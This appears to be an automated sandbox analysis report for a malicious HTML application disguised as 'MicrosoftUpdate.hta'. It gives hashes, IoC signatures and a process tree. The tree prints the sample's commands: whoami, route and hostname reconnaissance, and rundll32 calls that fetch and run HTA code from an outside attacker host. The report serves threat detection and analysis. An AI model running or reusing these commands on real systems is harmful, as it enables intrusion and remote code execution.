Resubmissions
25-06-2021 19:32
210625-6wc8e9cwj2 817-01-2021 18:55
210117-eh6j4sptaa 1022-12-2020 13:14
201222-pnne3mqwlx 10Analysis
-
max time kernel
20s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
17-01-2021 18:55
Static task
static1
Behavioral task
behavioral1
Sample
MicrosoftUpdate.hta
Resource
win7v20201028
Behavioral task
behavioral2
Sample
MicrosoftUpdate.hta
Resource
win10v20201028
General
-
Target
MicrosoftUpdate.hta
-
Size
26KB
-
MD5
12cd7a34e347311c7f07b5b10adb1266
-
SHA1
fc35180c4e3f0e95e02b163ddbd79ce4151e3ee4
-
SHA256
8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869
-
SHA512
31e4558f4fa8e9adc1e288b025ad3085f89abf3a89bb6a3857cea773c25cd97efb01cb5e814dc6f91766042f7ce1f007e621b84f09500d3672d5828a584c0e38
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
Processes:
mshta.exerundll32.exerundll32.exerundll32.exeflow pid process 11 860 mshta.exe 12 1520 rundll32.exe 13 1520 rundll32.exe 14 1688 rundll32.exe 15 1688 rundll32.exe 16 3212 rundll32.exe 17 1688 rundll32.exe 18 3212 rundll32.exe -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
whoami.exewhoami.exedescription pid process Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 3128 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe Token: SeDebugPrivilege 2732 whoami.exe -
Suspicious use of WriteProcessMemory 66 IoCs
Processes:
mshta.execmd.execmd.execmd.exerundll32.execmd.execmd.execmd.exerundll32.exerundll32.execmd.exedescription pid process target process PID 860 wrote to memory of 2920 860 mshta.exe cmd.exe PID 860 wrote to memory of 2920 860 mshta.exe cmd.exe PID 860 wrote to memory of 2920 860 mshta.exe cmd.exe PID 2920 wrote to memory of 2928 2920 cmd.exe chcp.com PID 2920 wrote to memory of 2928 2920 cmd.exe chcp.com PID 2920 wrote to memory of 2928 2920 cmd.exe chcp.com PID 2920 wrote to memory of 3128 2920 cmd.exe whoami.exe PID 2920 wrote to memory of 3128 2920 cmd.exe whoami.exe PID 2920 wrote to memory of 3128 2920 cmd.exe whoami.exe PID 860 wrote to memory of 192 860 mshta.exe cmd.exe PID 860 wrote to memory of 192 860 mshta.exe cmd.exe PID 860 wrote to memory of 192 860 mshta.exe cmd.exe PID 192 wrote to memory of 940 192 cmd.exe chcp.com PID 192 wrote to memory of 940 192 cmd.exe chcp.com PID 192 wrote to memory of 940 192 cmd.exe chcp.com PID 860 wrote to memory of 516 860 mshta.exe cmd.exe PID 860 wrote to memory of 516 860 mshta.exe cmd.exe PID 860 wrote to memory of 516 860 mshta.exe cmd.exe PID 516 wrote to memory of 2716 516 cmd.exe chcp.com PID 516 wrote to memory of 2716 516 cmd.exe chcp.com PID 516 wrote to memory of 2716 516 cmd.exe chcp.com PID 516 wrote to memory of 3488 516 cmd.exe ROUTE.EXE PID 516 wrote to memory of 3488 516 cmd.exe ROUTE.EXE PID 516 wrote to memory of 3488 516 cmd.exe ROUTE.EXE PID 860 wrote to memory of 1520 860 mshta.exe rundll32.exe PID 860 wrote to memory of 1520 860 mshta.exe rundll32.exe PID 860 wrote to memory of 1520 860 mshta.exe rundll32.exe PID 1520 wrote to memory of 2344 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 2344 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 2344 1520 rundll32.exe cmd.exe PID 2344 wrote to memory of 3164 2344 cmd.exe chcp.com PID 2344 wrote to memory of 3164 2344 cmd.exe chcp.com PID 2344 wrote to memory of 3164 2344 cmd.exe chcp.com PID 2344 wrote to memory of 2732 2344 cmd.exe whoami.exe PID 2344 wrote to memory of 2732 2344 cmd.exe whoami.exe PID 2344 wrote to memory of 2732 2344 cmd.exe whoami.exe PID 1520 wrote to memory of 2924 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 2924 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 2924 1520 rundll32.exe cmd.exe PID 2924 wrote to memory of 2984 2924 cmd.exe chcp.com PID 2924 wrote to memory of 2984 2924 cmd.exe chcp.com PID 2924 wrote to memory of 2984 2924 cmd.exe chcp.com PID 1520 wrote to memory of 1956 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 1956 1520 rundll32.exe cmd.exe PID 1520 wrote to memory of 1956 1520 rundll32.exe cmd.exe PID 1956 wrote to memory of 4060 1956 cmd.exe chcp.com PID 1956 wrote to memory of 4060 1956 cmd.exe chcp.com PID 1956 wrote to memory of 4060 1956 cmd.exe chcp.com PID 1956 wrote to memory of 4024 1956 cmd.exe ROUTE.EXE PID 1956 wrote to memory of 4024 1956 cmd.exe ROUTE.EXE PID 1956 wrote to memory of 4024 1956 cmd.exe ROUTE.EXE PID 1520 wrote to memory of 1688 1520 rundll32.exe rundll32.exe PID 1520 wrote to memory of 1688 1520 rundll32.exe rundll32.exe PID 1520 wrote to memory of 1688 1520 rundll32.exe rundll32.exe PID 1688 wrote to memory of 3212 1688 rundll32.exe rundll32.exe PID 1688 wrote to memory of 3212 1688 rundll32.exe rundll32.exe PID 1688 wrote to memory of 3212 1688 rundll32.exe rundll32.exe PID 3212 wrote to memory of 1300 3212 rundll32.exe cmd.exe PID 3212 wrote to memory of 1300 3212 rundll32.exe cmd.exe PID 3212 wrote to memory of 1300 3212 rundll32.exe cmd.exe PID 1300 wrote to memory of 3980 1300 cmd.exe chcp.com PID 1300 wrote to memory of 3980 1300 cmd.exe chcp.com PID 1300 wrote to memory of 3980 1300 cmd.exe chcp.com PID 1300 wrote to memory of 3024 1300 cmd.exe HOSTNAME.EXE
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MicrosoftUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txt 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4373⤵
-
C:\Windows\SysWOW64\whoami.exewhoami /all3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txt 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4373⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txt 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4373⤵
-
C:\Windows\SysWOW64\ROUTE.EXEroute PRINT3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?6MCQS7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;\..\..\..\./mshtml,RunHTMLApplication2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txt 2>&13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4374⤵
-
C:\Windows\SysWOW64\whoami.exewhoami /all4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txt 2>&13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4374⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txt 2>&13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4374⤵
-
C:\Windows\SysWOW64\ROUTE.EXEroute PRINT4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=;\..\..\..\./mshtml,RunHTMLApplication3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=fc0ea65803ea476083c12cb4d33724aa;\..\..\..\./mshtml,RunHTMLApplication4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c chcp 437 & hostname 1> C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txt 2>&15⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 4376⤵
-
C:\Windows\SysWOW64\HOSTNAME.EXEhostname6⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txtMD5
b01c5569842ec70942eb82fad388640b
SHA18e3800031c3f2b38f7875a17a1522e044f7563b8
SHA256fc4bc75cba4b36e52a32e1c4155e70d24518504d1e60fee7cca7dd51b8d3928c
SHA5124a7a56050e217b88e8dd410d21883a2e3b9406be6c0f6017d96923459ea8c8fa50b19ddc51564d9cb0141717b1e5b87c833246a6ebeff16a0d7ee767bf27ed08
-
C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txtMD5
a869fd098c3b03cfc21f6c6d96f9f315
SHA189e60a93de393e1769338af53726d0973e725ff7
SHA25615c90f0fcacb2eab1fde5b5c13fba9ad9c535127db418b4f47a64ec2d90c8e51
SHA512a57e3a9fb1d7bbfe933dd64413331023930cfdbfa3cc9d763e402c1b357aeadba8fecad721d7bd2b8c529473d988170f827d0f57b51c53a37b980d3bcc51c154
-
C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txtMD5
b639a417d3b5ec42f1f7080f5ee1c696
SHA11577abacb53284ec0fa61965740114a3f96a0d30
SHA256e9780403692b6d7c05c67e7ab85367ef1118d5f480187027c0bc4d7aa00f464b
SHA512a3a8bfd2b835b4c53657d29f63132bcdf01f17e0c23da4f6155295aac24a757de4e557e007c1ae56571389e700838b76ea6c394e64b9efad75ab3641e611f4f0
-
C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txtMD5
f0d77ff34694f66fa41eab0f98efa362
SHA12ecc80e3560b66e79b6653b0652a9f05bee30d9b
SHA25699bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d
SHA5127e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea
-
C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txtMD5
b01c5569842ec70942eb82fad388640b
SHA18e3800031c3f2b38f7875a17a1522e044f7563b8
SHA256fc4bc75cba4b36e52a32e1c4155e70d24518504d1e60fee7cca7dd51b8d3928c
SHA5124a7a56050e217b88e8dd410d21883a2e3b9406be6c0f6017d96923459ea8c8fa50b19ddc51564d9cb0141717b1e5b87c833246a6ebeff16a0d7ee767bf27ed08
-
C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txtMD5
b639a417d3b5ec42f1f7080f5ee1c696
SHA11577abacb53284ec0fa61965740114a3f96a0d30
SHA256e9780403692b6d7c05c67e7ab85367ef1118d5f480187027c0bc4d7aa00f464b
SHA512a3a8bfd2b835b4c53657d29f63132bcdf01f17e0c23da4f6155295aac24a757de4e557e007c1ae56571389e700838b76ea6c394e64b9efad75ab3641e611f4f0
-
C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txtMD5
f0d77ff34694f66fa41eab0f98efa362
SHA12ecc80e3560b66e79b6653b0652a9f05bee30d9b
SHA25699bf1d0e1aff0d01d67b974154d05f07b2829c9ccd625105d6678301947d3c3d
SHA5127e6f22fcb88f86e0c99bee650d6ab600540ddeca3301ac7c6594246a3a495edaedc7f850013f69d818f521dcf9d733ea97aaec1549be11b1abe3ee6719ec6dea
-
memory/192-6-0x0000000000000000-mapping.dmp
-
memory/516-9-0x0000000000000000-mapping.dmp
-
memory/940-7-0x0000000000000000-mapping.dmp
-
memory/1300-27-0x0000000000000000-mapping.dmp
-
memory/1520-13-0x0000000000000000-mapping.dmp
-
memory/1688-25-0x0000000000000000-mapping.dmp
-
memory/1956-21-0x0000000000000000-mapping.dmp
-
memory/2344-14-0x0000000000000000-mapping.dmp
-
memory/2716-10-0x0000000000000000-mapping.dmp
-
memory/2732-16-0x0000000000000000-mapping.dmp
-
memory/2920-2-0x0000000000000000-mapping.dmp
-
memory/2924-18-0x0000000000000000-mapping.dmp
-
memory/2928-3-0x0000000000000000-mapping.dmp
-
memory/2984-19-0x0000000000000000-mapping.dmp
-
memory/3024-29-0x0000000000000000-mapping.dmp
-
memory/3128-4-0x0000000000000000-mapping.dmp
-
memory/3164-15-0x0000000000000000-mapping.dmp
-
memory/3212-26-0x0000000000000000-mapping.dmp
-
memory/3488-11-0x0000000000000000-mapping.dmp
-
memory/3980-28-0x0000000000000000-mapping.dmp
-
memory/4024-23-0x0000000000000000-mapping.dmp
-
memory/4060-22-0x0000000000000000-mapping.dmp